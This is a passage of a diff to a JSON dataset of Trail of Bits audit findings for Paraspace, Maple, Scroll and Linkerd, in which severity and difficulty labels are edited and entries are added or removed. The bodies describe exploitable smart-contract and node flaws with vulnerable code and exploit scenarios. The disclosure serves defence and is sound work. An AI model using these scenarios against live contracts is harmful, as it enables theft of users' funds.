reserves.length; i++) { ... DataTypes.AssetType assetType; ( reserveData.isActive, reserveData.isFrozen, reserveData.borrowingEnabled, reserveData.stableBorrowRateEnabled, isPaused, assetType ) = reserveConfigurationMap.getFlags(); ... } ... return (reservesData, baseCurrencyInfo); } Figure 6.2: contracts/ui/UiPoolDataProvider.sol#L83L269 Exploit Scenario Alice writes o-chain code that calls getReservesData. Alices code treats the returned name and assetType elds as if they have been properly lled in. Because these elds have not been set, Alices code behaves incorrectly (e.g., by trying to transfer ERC721 tokens as though they were ERC20 tokens). Recommendations Short term, adjust getReservesData so that it sets the name and assetType elds. Doing so will help prevent o-chain code from receiving uninitialized data. Long term, test code that is meant to be called from o-chain to verify that every returned eld is set. Doing so can help to catch bugs like this one.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: High" ] }, @@ -406,7 +376,7 @@ "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -415,27 +385,7 @@ "body": "The _transferCollaterizable function mishandles the collaterizedBalance and _isUsedAsCollateral elds. At a minimum, this means that transferred tokens cannot be used as collateral. The code for _transferCollaterizable appears in gure 9.1. It is called from Ntoken._transfer (gure 9.2). The code decreases _userState[from].collaterizedBalance and clears _isUsedAsCollateral[tokenId]. However, the code does not make any corresponding changes, such as increasing _userState[to].collaterizedBalance and setting _isUsedAsCollateral[tokenId] elsewhere. As a result, if Alice transfers her NToken to Bob, Bob will not be able to use the corresponding ERC721 token as collateral. function _transferCollaterizable( address from, address to, uint256 tokenId ) internal virtual returns (bool isUsedAsCollateral_) { isUsedAsCollateral_ = _isUsedAsCollateral[tokenId]; if (from != to && isUsedAsCollateral_) { _userState[from].collaterizedBalance -= 1; delete _isUsedAsCollateral[tokenId]; } MintableIncentivizedERC721._transfer(from, to, tokenId); } Figure 9.1: contracts/protocol/tokenization/base/MintableIncentivizedERC721.sol#L643 L656 function _transfer( address from, address to, uint256 tokenId, bool validate ) internal { address underlyingAsset = _underlyingAsset; uint256 fromBalanceBefore = collaterizedBalanceOf(from); uint256 toBalanceBefore = collaterizedBalanceOf(to); bool isUsedAsCollateral = _transferCollaterizable(from, to, tokenId); ... } Figure 9.2: contracts/protocol/tokenization/NToken.sol#L300L324 The code used to verify the bug appears in gure 9.3. The code rst veries that the collaterizedBalance and _isUsedAsCollateral elds are set correctly. It then has User 1 send his or her token to User 2, who sends it back to User 1. Finally, it veries that the collaterizedBalance and _isUsedAsCollateral elds are set incorrectly. Most subsequent tests fail thereafter. it(\"User 1 sends the nToken to User 2, who sends it back to User 1\", async () => { const { nBAYC, users: [user1, user2], } = testEnv; expect(await nBAYC.isUsedAsCollateral(0)).to.be.equal(true); expect(await nBAYC.collaterizedBalanceOf(user1.address)).to.be.equal(1); expect(await nBAYC.collaterizedBalanceOf(user2.address)).to.be.equal(0); await nBAYC.connect(user1.signer).transferFrom(user1.address, user2.address, 0); await nBAYC.connect(user2.signer).transferFrom(user2.address, user1.address, 0); expect(await nBAYC.isUsedAsCollateral(0)).to.be.equal(false); expect(await nBAYC.collaterizedBalanceOf(user1.address)).to.be.equal(0); expect(await nBAYC.collaterizedBalanceOf(user2.address)).to.be.equal(0); }); it(\"User 2 deposits 10k DAI and User 1 borrows 8K DAI\", async () => { Figure 9.3: This is the code used to verify the bug. The highlighted line appears in the ntoken.spec.ts le. What precedes it was added to that le. Exploit Scenario Alice, a Paraspace user, maintains several accounts. Alice transfers an NToken from one of her accounts to another. She tries to borrow against the NTokens corresponding ERC721 token but is unable to. Alice misses a nancial opportunity while trying to determine the source of the error. Recommendations Short term, implement one of the following two options: Correct the accounting errors in the code in gure 9.1. (We experimented with this but were not able to determine all of the necessary changes.) Correcting the accounting errors will help ensure that users observe predictable behavior regarding NTokens. Disallow the transferring of assets that have been registered as collateral. If a user is to be surprised by her NTokens behavior, it is better that it happen sooner (when the user tries to transfer) than later (when the user tries to borrow). Long term, expand the tests in ntoken.spec.ts to include scenarios such as transferring NTokens among users. Including such tests could help to uncover similar bugs. Note that ntoken.spec.ts includes at least one broken test (gure 9.3). The token ID passed to nBAYC.transferFrom should be 0, not 1. Furthermore, the test checks for the wrong error message. It should be Health factor is lesser than the liquidation threshold, not ERC721: operator query for nonexistent token. it(\"User 1 tries to send the nToken to User 2 (should fail)\", async () => { const { nBAYC, users: [user1, user2], } = testEnv; await expect( nBAYC.connect(user1.signer).transferFrom(user1.address, user2.address, 1) ).to.be.revertedWith(\"ERC721: operator query for nonexistent token\"); }); Figure 9.4: test-suites/ntoken.spec.ts#L74L83", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" - ] - }, - { - "title": "4. Incorrect GovernorshipAccepted event argument ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-maplefinance-mapleprotocolv2-securityreview.pdf", - "body": "The MapleGlobals contract emits the GovernorshipAccepted event with an incorrect previous owner value. MapleGlobals implements a two-step process for ownership transfer in which the current owner has to set the new governor, and then the new governor has to accept it. The acceptGovernor function rst sets the new governor with _setAddress and then emits the GovernorshipAccepted event with the rst argument dened as the old governor and the second the new one. However, because the admin() function returns the current value of the governor, both arguments will be the new governor. function acceptGovernor() external { require(msg.sender == pendingGovernor, \"MG:NOT_PENDING_GOVERNOR\"); _setAddress(ADMIN_SLOT, msg.sender); pendingGovernor = address(0); emit GovernorshipAccepted(admin(), msg.sender); } Figure 4.1: acceptGovernor function (globals-v2/contracts/MapleGlobals.sol#87-92) Exploit Scenario The Maple team decides to transfer the MapleGlobals governor to a new multi-signature wallet. The team has a script that veries the correct execution by checking the events emitted; however, this script creates a false alert because the GovernorshipAccepted event does not have the expected arguments. Recommendations Short term, emit the GovernorshipAccepted event before calling _setAddress. Long term, add tests to check the events have the expected arguments.", - "labels": [ - "Trail of Bits", - "Severity: Low", - "Difficulty: Low" - ] - }, - { - "title": "5. Partially incorrect Chainlink price feed safety checks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-maplefinance-mapleprotocolv2-securityreview.pdf", - "body": "The getLatestPrice function retrieves a specic asset price from Chainlink. However, the price (a signed integer) is rst checked that it is non-zero and then is cast to an unsigned integer with a potentially negative value. An incorrect price would temporarily aect the expected amount of fund assets during liquidation. function getLatestPrice(address asset_) external override view returns (uint256 latestPrice_) { // If governor has overridden price because of oracle outage, return overridden price. if (manualOverridePrice[asset_] != 0) return manualOverridePrice[asset_]; ( uint80 roundId_, int256 price_, , uint256 updatedAt_, uint80 answeredInRound_ ) = IChainlinkAggregatorV3Like(oracleFor[asset_]).latestRoundData(); require(updatedAt_ != 0, \"MG:GLP:ROUND_NOT_COMPLETE\"); require(answeredInRound_ >= roundId_, \"MG:GLP:STALE_DATA\"); require(price_ != int256(0), \"MG:GLP:ZERO_PRICE\"); latestPrice_ = uint256(price_); } Figure 5.1: getLatestPrice function (globals-v2/contracts/MapleGlobals.sol#297-308) Exploit Scenario Chainlinks oracle returns a negative value for an in-process liquidation. This value is then unsafely cast to an uint256. The expected amount of fund assets from the protocol is incorrect, which prevents liquidation. Recommendations Short term, check that the price is greater than 0. Long term, add tests for the Chainlink price feed with various edge cases. Additionally, set up a monitoring system in the event of unexpected market failures. A Chainlink oracle can have a minimum and maximum value, and if the real price is outside of that range, it will not be possible to update the oracle; as a result, it will report an incorrect price, and it will be impossible to know this on-chain.", - "labels": [ - "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, @@ -445,7 +395,7 @@ "body": "The IPriceOracle interface is used only in tests, yet it appears alongside production code. Its location increases the risk that a developer will try to use it in production code. The complete interface appears in gure 10.1. Note that the interface includes code that a real oracle is unlikely to include, such as the setAssetPrice function. Therefore, a developer that calls this function would likely introduce a bug into the code. // SPDX-License-Identifier: AGPL-3.0 pragma solidity 0.8.10; /** * @title IPriceOracle * * @notice Defines the basic interface for a Price oracle. **/ interface IPriceOracle { /** * @notice Returns the asset price in the base currency * @param asset The address of the asset * @return The price of the asset **/ function getAssetPrice(address asset) external view returns (uint256); /** * @notice Set the price of the asset * @param asset The address of the asset * @param price The price of the asset **/ function setAssetPrice(address asset, uint256 price) external; } Figure 10.1: contracts/interfaces/IPriceOracle.sol Exploit Scenario Alice, a Paraspace developer, uses the IPriceOracle interface in production code. Alices contract tries to call the setAssetPrice method. When the vulnerable code path is exercised, Alices contract reverts unexpectedly. Recommendations Short term, move IPriceOracle.sol to a location that makes it clear that it should be used in testing code only. Adjust all references to the le accordingly. Doing so will reduce the risk that the le is used in production code. Long term, as new code is added to the codebase, maintain segregation between production and testing code. Testing code is typically not held to the same standards as production code. Calling testing code from production code could introduce bugs.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, @@ -455,7 +405,7 @@ "body": "The PoolCore contract has an external function supplyERC721FromNToken, whose purpose is to validate that the given ERC721 assets are owned by the NToken contract and then to mint the corresponding NTokens to a caller-supplied address. We suspect that the intended use case for this function is that the NTokenMoonBirds or UniswapV3Gateway contract will transfer the ERC721 assets to the NToken contract and then immediately call supplyERC721FromNToken. However, the access controls on this function allow an unauthorized user to take ownership of any assets manually transferred to the NToken contract, for whatever reason that may be, as NToken does not track the original owner of the asset. function supplyERC721FromNToken( address asset, DataTypes.ERC721SupplyParams[] calldata tokenData, address onBehalfOf ) external virtual override nonReentrant { SupplyLogic.executeSupplyERC721FromNToken( // ... ); } Figure 11.1: The external supplyERC721FromNToken function within PoolCore function validateSupplyFromNToken( DataTypes.ReserveCache memory reserveCache, DataTypes.ExecuteSupplyERC721Params memory params, DataTypes.AssetType assetType ) internal view { // ... for (uint256 index = 0; index < amount; index++) { // validate that the owner of the underlying asset is the NToken contract require( IERC721(params.asset).ownerOf( params.tokenData[index].tokenId ) == reserveCache.xTokenAddress, Errors.NOT_THE_OWNER ); // validate that the owner of the ntoken that has the same tokenId is the zero address require( IERC721(reserveCache.xTokenAddress).ownerOf( params.tokenData[index].tokenId ) == address(0x0), Errors.NOT_THE_OWNER ); } } Figure 11.2: The validation checks performed by supplyERC721FromNToken function executeSupplyERC721Base( uint16 reserveId, address nTokenAddress, DataTypes.UserConfigurationMap storage userConfig, DataTypes.ExecuteSupplyERC721Params memory params ) internal { // ... bool isFirstCollaterarized = INToken(nTokenAddress).mint( params.onBehalfOf, params.tokenData ); // ... } Figure 11.3: The unauthorized minting operation Users regularly interact with the NToken contract, which represents ERC721 assets, so it is possible that a malicious actor could convince users to transfer their ERC721 assets to the contract in an unintended manner. Exploit Scenario Alice, an unaware owner of some ERC721 assets, is convinced to transfer her assets to the NToken contract (or transfers them on her own accord, unaware that she should not). A malicious third party mints NTokens from Alices assets and withdraws them to his own account. Recommendations Short term, document the purpose and use of the NToken contract to ensure that users are unambiguously aware that ERC721 tokens are not meant to be sent directly to the NToken contract. Long term, consider whether supplyERC721FromNToken should have more access controls around it. Additional access controls could prevent attackers from taking ownership of any incorrectly transferred asset. In particular, this function is called from only two locations, so a msg.sender whitelist could be sucient. Additionally, if possible, consider adding additional metadata to the contract to track the original owner of ERC721 assets, and consider providing a mechanism for transferring any asset without a corresponding NToken back to the original owner.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: Low" ] }, @@ -465,17 +415,7 @@ "body": "When a user liquidates another users ERC20 tokens and opts to receive PTokens, the PTokens are automatically registered as collateral. However, when a user liquidates another users ERC721 token and opts to receive an NToken, the NToken is not automatically registered as collateral. This discrepancy could be confusing for users. The relevant code appears in gures 12.1 through 12.3. For ERC20 tokens, _liquidatePTokens is called, which in turns calls setUsingAsCollateral if the liquidator has not already designated the PTokens as collateral (gures 12.1 and 12.2). However, for an ERC721 token, the NToken is simply transferred (gure 12.3). if (params.receiveXToken) { _liquidatePTokens(usersConfig, collateralReserve, params, vars); } else { Figure 12.1: contracts/protocol/libraries/logic/LiquidationLogic.sol#L310L312 function _liquidatePTokens( mapping(address => DataTypes.UserConfigurationMap) storage usersConfig, DataTypes.ReserveData storage collateralReserve, DataTypes.ExecuteLiquidationCallParams memory params, LiquidationCallLocalVars memory vars ) internal { ... if (liquidatorPreviousPTokenBalance == 0) { DataTypes.UserConfigurationMap storage liquidatorConfig = usersConfig[vars.liquidator]; liquidatorConfig.setUsingAsCollateral(collateralReserve.id, true); emit ReserveUsedAsCollateralEnabled( params.collateralAsset, vars.liquidator ); } } Figure 12.2: contracts/protocol/libraries/logic/LiquidationLogic.sol#L667L693 if (params.receiveXToken) { INToken(vars.collateralXToken).transferOnLiquidation( params.user, vars.liquidator, params.collateralTokenId ); } else { Figure 12.3: contracts/protocol/libraries/logic/LiquidationLogic.sol#L562L568 Exploit Scenario Alice, a Paraspace user, liquidates several ERC721 tokens. Alice comes to expect that received NTokens are not designated as collateral. Eventually, Alice liquidates another users ERC20 tokens and opts to receive PTokens. Bob liquidates Alices PTokens, and Alice loses the underlying ERC20 tokens as a result. Recommendations Short term, conspicuously document the fact that PToken and NToken liquidations behave dierently. Doing so will reduce the likelihood that users will be surprised by the inconsistency. Long term, consider whether the behavior should be made consistent. That is, decide whether NTokens and PTokens should be automatically collateralized on liquidation, and implement such behavior for both types of tokens. A consistent API is less likely to be a source of errors.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" - ] - }, - { - "title": "9. Attackers can prevent the pool manager from nishing liquidation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-maplefinance-mapleprotocolv2-securityreview.pdf", - "body": "The finishCollateralLiquidation function requires that a liquidation is no longer active. However, an attacker can prevent the liquidation from nishing by sending a minimal amount of collateral token to the liquidator address. function finishCollateralLiquidation(address loan_) external override nonReentrant returns (uint256 remainingLosses_, uint256 platformFees_) { require(msg.sender == poolManager, \"LM:FCL:NOT_POOL_MANAGER\"); require(!isLiquidationActive(loan_), \"LM:FCL:LIQ_STILL_ACTIVE\"); [...] if (toTreasury_ != 0) ILiquidatorLike(liquidationInfo_.liquidator).pullFunds(fundsAsset, mapleTreasury(), toTreasury_); if (toPool_ != 0) ILiquidatorLike(liquidationInfo_.liquidator).pullFunds(fundsAsset, pool, toPool_); if (recoveredFunds_ != 0) ILiquidatorLike(liquidationInfo_.liquidator).pullFunds(fundsAsset, ILoanLike(loan_).borrower(), recoveredFunds_); Figure 9.1: An excerpt of the finishCollateralLiquidation function (pool-v2/contracts/LoanManager.sol#L199-L232) The finishCollateralLiquidation function uses the isLiquidationActive function to verify if the liquidation process is nished by checking the collateral asset balance of the liquidator address. Because anyone can send tokens to that address, it is possible to make isLiquidationActive always return false. function isLiquidationActive(address loan_) public view override returns (bool isActive_) { address liquidatorAddress_ = liquidationInfo[loan_].liquidator; // TODO: Investigate dust collateralAsset will ensure `isLiquidationActive` is always true. isActive_ = (liquidatorAddress_ != address(0)) && (IERC20Like(ILoanLike(loan_).collateralAsset()).balanceOf(liquidatorAddress_) != uint256(0)); } Figure 9.2: The isLiquidationActive function (pool-v2/contracts/LoanManager.sol#L702-L707) Exploit Scenario Alice's loan is being liquidated. Bob, the pool manager, tries to call finishCollateralLiquidation to get back the recovered funds. Eve front-runs Bobs call by sending 1 token of the collateral asset to the liquidator address. As a consequence, Bob cannot recover the funds. Recommendations Short term, use a storage variable to track the remaining collateral in the Liquidator contract. As a result, the collateral balance cannot be manipulated through the transfer of tokens and can be safely checked in isLiquidationActive. Long term, avoid using exact comparisons for ether and token balances, as users can increase those balances by executing transfers, making the comparisons evaluate to false.", - "labels": [ - "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: High" ] }, @@ -485,7 +425,7 @@ "body": "Some validation functions involving assets do not check the given assets type. Such checks should be added to ensure defense in depth. The validateRepay function is one example (gure 13.1). The function performs several checks involving the asset being repaid, but the function does not check that the asset is an ERC20 asset. function validateRepay( DataTypes.ReserveCache memory reserveCache, uint256 amountSent, DataTypes.InterestRateMode interestRateMode, address onBehalfOf, uint256 stableDebt, uint256 variableDebt ) internal view { ... (bool isActive, , , , bool isPaused, ) = reserveCache .reserveConfiguration .getFlags(); require(isActive, Errors.RESERVE_INACTIVE); require(!isPaused, Errors.RESERVE_PAUSED); ... } Figure 13.1: contracts/protocol/libraries/logic/ValidationLogic.sol#L403L447 Another example is the validateFlashloanSimple function, which does not check that the loaned asset is an ERC20 asset. We do not believe that the absence of these checks currently represents a vulnerability. However, adding these checks will help protect the code against future modications. Exploit Scenario Alice, a Paraspace developer, implements a feature allowing users to ash loan ERC721 tokens to other users in exchange for a fee. Alice uses the validateFlashloanSimple function as a template for implementing the new validation code. Therefore, Alices additions lack a check that the loaned assets are actually ERC721 assets. Some users lose ERC20 tokens as a result. Recommendations Short term, ensure that each validation function involving assets veries the type of the asset involved. Doing so will help protect the code against future modications. Long term, regularly review all conditionals involving asset types to verify that they handle all applicable asset types correctly. Doing so will help to identify problems involving the handling of dierent asset types.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, @@ -495,8 +435,8 @@ "body": "Flash claims enable users with collateralized NFTs to assume ownership of the underlying asset for the duration of a single transaction, with the condition that the NFT be returned at the end of the transaction. When used with typical NFTs, such as Bored Ape Yacht Club tokens, the atomic nature of ash claims prevents users from removing net value from the Paraspace contract while enabling them to claim rewards, such as airdrops, that they are entitled to by virtue of owning the NFTs. Uniswap v3 NFTs represent a position in a Uniswap liquidity pool and entitle the owner to add or withdraw liquidity from the underlying Uniswap position. Uniswap v3 NFT prices are determined by summing the value of the two ERC20 tokens deposited as liquidity in the underlying position. Normally, when a Uniswap NFT is deposited in the Uniswap NToken contract, the user can withdraw liquidity only if the resulting price leaves the users health factor above one. However, by leveraging the ash claim system, a user could claim the Uniswap v3 NFT temporarily and withdraw liquidity directly, returning a valueless NFT. As currently implemented, Paraspace is not vulnerable to this attack because Uniswap v3 ash claims are, apparently accidentally, nonfunctional. A check in the onERC721Recieved function of the NTokenUniswapV3 contract, which is designed to prevent users from depositing Uniswap positions via the supplyERC721 method, incidentally prevents Uniswap NFTs from being returned to the contract during the ash claim process. However, this check could be removed in future updates and occurs at the very last step in what would otherwise be a successful exploit. function onERC721Received( address operator, address, uint256 id, bytes memory ) external virtual override returns (bytes4) { // ... // if the operator is the pool, this means that the pool is transferring the token to this contract // which can happen during a normal supplyERC721 pool tx if (operator == address(POOL)) { revert(Errors.OPERATION_NOT_SUPPORTED); } Figure 14.1: The failing check that prevents the completion of Uniswap v3 ash claims Exploit Scenario Alice, a Paraspace developer, decides to move the check that prevents users from depositing Uniswap v3 NFTs via the supplyERC721 method out of the onERC721Received function and into the Paraspace Pool contract. She thus unwittingly enables ash claims for Uniswap v3 positions. Bob, a malicious actor, then deposits a Uniswap NFT worth 100 ETH and borrows 30 ETH against it. Bob ash claims the NFT and withdraws the 100 ETH of liquidity, leaving a worthless NFT as collateral and taking the 30 ETH as prot. Recommendations Short term, disable Uniswap v3 NFT ash claims explicitly by requiring in ValidationLogic.validateFlashClaim that the ash claimed NFT not be atomically priced. Long term, consider adding a user healthFactor check after the return phase of the ash claim process to ensure that users cannot become undercollateralized as a result of ash claims.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: High" + "Severity: High", + "Difficulty: Low" ] }, { @@ -505,17 +445,47 @@ "body": "As part of the ash claim functionality, Paraspace provides an implementation of a contract that can claim airdrops on behalf of NFT holders. This contract tracks claimed airdrops in the airdropClaimRecords mapping, indexed by the result of the getClaimKeyHash function. However, it is possible for two dierent inputs to getClaimKeyHash to result in identical hashes through a collision in the unpacked encoding. Because nftTokenIds and params are both variable-length inputs, an input with nftTokenIds equal to uint256(1) and an empty params will hash to the same value as an input with an empty nftTokenIds and params equal to uint256(1). Although the airdropClaimRecords mapping is not read or otherwise referenced elsewhere in the code, collisions may cause o-chain clients to mistakenly believe that an unclaimed airdrop has already been claimed. function getClaimKeyHash( address initiator, address nftAsset, uint256[] calldata nftTokenIds, bytes calldata params ) public pure returns (bytes32) { return keccak256( abi.encodePacked(initiator, nftAsset, nftTokenIds, params) ); } Figure 15.1: contracts/misc/flashclaim/AirdropFlashClaimReceiver.sol#L247257 Exploit Scenario Paraspace develops an o-chain tool to help users automatically claim airdrops for their NFTs. By chance or through malfeasance, two dierent airdrop claim operations for the same nftAsset result in the same claimKeyHash. The tool then mistakenly believes that it has claimed both airdrops when, in reality, it claimed only one. Recommendations Short term, encode the input to keccak256 using abi.encode in order to preserve boundaries between inputs. Long term, consider using an EIP-712 compatible structured hash encoding with domain separation wherever hashes will be used as unique identiers or signed messages.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, + { + "title": "1. Attacker can prevent L2 transactions from being added to a block ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-securityreview.pdf", + "body": "The commitTransactions function returns a ag that determines whether to halt transaction production, even if the block has room for more transactions to be added. If the circuit checker returns an error either for row consumption being too high or reasons unknown, the circuitCapacityReached ag is set to true (gure 1.1). case (errors.Is(err, circuitcapacitychecker.ErrTxRowConsumptionOverflow) && tx.IsL1MessageTx()): // Circuit capacity check: L1MessageTx row consumption too high, shift to the next from the account, // because we shouldn't skip the entire txs from the same account. // This is also useful for skipping \"problematic\" L1MessageTxs. queueIndex := tx.AsL1MessageTx().QueueIndex log.Trace(\"Circuit capacity limit reached for a single tx\", \"tx\", tx.Hash().String(), \"queueIndex\", queueIndex) log.Info(\"Skipping L1 message\", \"queueIndex\", queueIndex, \"tx\", tx.Hash().String(), \"block\", w.current.header.Number, \"reason\", \"row consumption overflow\") w.current.nextL1MsgIndex = queueIndex + 1 // after `ErrTxRowConsumptionOverflow`, ccc might not revert updates // associated with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Shift()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrTxRowConsumptionOverflow) && !tx.IsL1MessageTx()): // Circuit capacity check: L2MessageTx row consumption too high, skip the account. // This is also useful for skipping \"problematic\" L2MessageTxs. log.Trace(\"Circuit capacity limit reached for a single tx\", \"tx\", tx.Hash().String()) // after `ErrTxRowConsumptionOverflow`, ccc might not revert updates // associated with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Pop()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrUnknown) && tx.IsL1MessageTx()): // Circuit capacity check: unknown circuit capacity checker error for L1MessageTx, // shift to the next from the account because we shouldn't skip the entire txs from the same account queueIndex := tx.AsL1MessageTx().QueueIndex log.Trace(\"Unknown circuit capacity checker error for L1MessageTx\", \"tx\", tx.Hash().String(), \"queueIndex\", queueIndex) log.Info(\"Skipping L1 message\", \"queueIndex\", queueIndex, \"tx\", tx.Hash().String(), \"block\", w.current.header.Number, \"reason\", \"unknown row consumption error\") w.current.nextL1MsgIndex = queueIndex + 1 // after `ErrUnknown`, ccc might not revert updates associated // with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Shift()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrUnknown) && !tx.IsL1MessageTx()): // Circuit capacity check: unknown circuit capacity checker error for L2MessageTx, skip the account log.Trace(\"Unknown circuit capacity checker error for L2MessageTx\", \"tx\", tx.Hash().String()) // after `ErrUnknown`, ccc might not revert updates associated // with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Pop()` circuitCapacityReached = true break loop Figure 1.1: Error handling for the circuit capacity checker (worker.go#L1073-L1121) When this ag is set to true, no new transactions will be added even if there is room for additional transactions in the block (gure 1.2). // Fill the block with all available pending transactions. pending := w.eth.TxPool().Pending(true) // Short circuit if there is no available pending transactions. // But if we disable empty precommit already, ignore it. Since // empty block is necessary to keep the liveness of the network. if len(pending) == 0 && pendingL1Txs == 0 && atomic.LoadUint32(&w.noempty) == 0 { w.updateSnapshot() return } // Split the pending transactions into locals and remotes localTxs, remoteTxs := make(map[common.Address]types.Transactions), pending for _, account := range w.eth.TxPool().Locals() { if txs := remoteTxs[account]; len(txs) > 0 { delete(remoteTxs, account) localTxs[account] = txs } } var skipCommit, circuitCapacityReached bool if w.chainConfig.Scroll.ShouldIncludeL1Messages() && len(l1Txs) > 0 { log.Trace(\"Processing L1 messages for inclusion\", \"count\", pendingL1Txs) txs := types.NewTransactionsByPriceAndNonce(w.current.signer, l1Txs, header.BaseFee) skipCommit, circuitCapacityReached = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } if len(localTxs) > 0 && !circuitCapacityReached { txs := types.NewTransactionsByPriceAndNonce(w.current.signer, localTxs, header.BaseFee) skipCommit, circuitCapacityReached = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } if len(remoteTxs) > 0 && !circuitCapacityReached { txs := types.NewTransactionsByPriceAndNonce(w.current.signer, remoteTxs, header.BaseFee) // don't need to get `circuitCapacityReached` here because we don't have further `commitTransactions` // after this one, and if we assign it won't take effect (`ineffassign`) skipCommit, _ = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } // do not produce empty blocks if w.current.tcount == 0 { return } w.commit(uncles, w.fullTaskHook, true, tstart) Figure 1.2: Pending transactions are not added if the circuit capacity has been reached. (worker.go#L1284-L1332) Exploit Scenario Eve, an attacker, sends an L2 transaction that uses ecrecover many times. The transaction is provided to the mempool with enough gas to be the rst L2 transaction in the blockchain. Because this causes an error in the circuit checker, it prevents all other L2 transactions from being executed in this block. Recommendations Short term, implement a snapshotting mechanism in the circuit checker to roll back unexpected changes made as a result of incorrect or incomplete computation. Long term, analyze and document all impacts of error handling across the system to ensure that these errors are handled gracefully. Additionally, clearly document all expected invariants of how the system is expected to behave to ensure that in interactions with other components, these invariants hold throughout the system.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "2. Unused and dead code ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-securityreview.pdf", + "body": "Due to the infrastructure setup of this network and the use of a single node clique setup, this fork of geth contains a signicant amount of unused logic. Continuing to maintain this code can be problematic and may lead to issues. The following are examples of unused and dead code: Uncle blockswith a single node clique network, there is no chance for uncle blocks to exist, so all the logic that handles and interacts with uncle blocks can be dropped. Redundant logic around updating the L1 queue index A redundant check on empty blocks in the worker.go le Recommendations Short term, remove anything that is no longer relevant for the current go-etheruem implementation and be sure to document all the changes to the codebase. Long term, remove all unused code from the codebase.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "3. Lack of documentation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-securityreview.pdf", + "body": "Certain areas of the codebase lack documentation, high-level descriptions, and examples, which makes the contracts dicult to review and increases the likelihood of user mistakes. Areas that would benet from being expanded and claried in code and documentation include the following: Internals of the CCC. Despite being treated as a black box, the code relies on stateful changes made from geth calls. This suggests that the internal states of the miner's work and the CCC overlap. The lack of documentation regarding these states creates a lack of visibility in evaluating whether there are potential state corruptions or unexpected behavior. Circumstances where transactions are skipped and how they are expected to be handled. During the course of the review, we attempted to reverse engineer the intended behavior of transactions considered skipped by the CCC. The lack of documentation in these areas results in unclear expectations for this code. Error handling standard throughout the system. The codebase handles system errors dierentlyin some cases, logging an error and continuing execution or logging traces. Listing out all instances where errors are identied and documenting how they are handled can help ensure that there is no unexpected behavior related to error handling. The documentation should include all expected properties and assumptions relevant to the aforementioned aspects of the codebase. Recommendations Short term, review and properly document the aforementioned aspects of the codebase. In addition to external documentation, NatSpec and inline code comments could help clarify complexities. Long term, consider writing a formal specication of the protocol. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, { "title": "1. Various unhandled errors ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-securityreview.pdf", "body": "The linkerd codebase contains various methods with unhandled errors. In most cases, errors returned by functions are simply not checked; in other cases, functions that surround deferred error-returning functions do not capture the relevant errors. Using gosec and errcheck, we detected a large number of such cases, which we cannot enumerate in this report. We recommend running these tools to uncover and resolve these cases. Figures 1.1 and 1.2 provide examples of functions in the codebase with unhandled errors: func (h *handler) handleProfileDownload(w http.ResponseWriter, req *http.Request, params httprouter.Params) { [...] w.Write(profileYaml.Bytes()) } Figure 1.1: web/srv/handlers.go#L65-L91 func renderStatStats(rows []*pb.StatTable_PodGroup_Row, options *statOptions) string { [...] writeStatsToBuffer(rows, w, options) w.Flush() [...] } Figure 1.2: viz/cmd/stat.go#L295-L302 We could not determine the severity of all of the unhandled errors detected in the codebase. Exploit Scenario While an operator of the Linkerd infrastructure interacts with the system, an uncaught error occurs. Due to the lack of error reporting, the operator is unaware that the operation did not complete successfully, and he produces further undened behavior. Recommendations Short term, run gosec and errcheck across the codebase. Resolve all issues pertaining to unhandled errors by checking them explicitly. Long term, ensure that all functions that return errors have explicit checks for these errors. Consider integrating the abovementioned tooling into the CI/CD pipeline to prevent undened behavior from occurring in the aected code paths.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: High" ] }, @@ -536,7 +506,7 @@ "labels": [ "Trail of Bits", "Severity: Undetermined", - "Difficulty: Low" + "Difficulty: Undetermined" ] }, { @@ -545,7 +515,7 @@ "body": "The runCheck function, responsible for performing health checks for various services, performs its core functions inside of an innite for loop. runCheck is called with a timeout stored in a context object. The cancel() function is deferred at the beginning of the loop. Calling defer inside of a loop could cause resource exhaustion conditions because the deferred function is called when the function exits, not at the end of each loop. As a result, resources from each context object are accumulated until the end of the for statement. While this may not cause noticeable issues in the current state of the application, it is best to call cancel() at the end of each loop to prevent unforeseen issues. func (hc 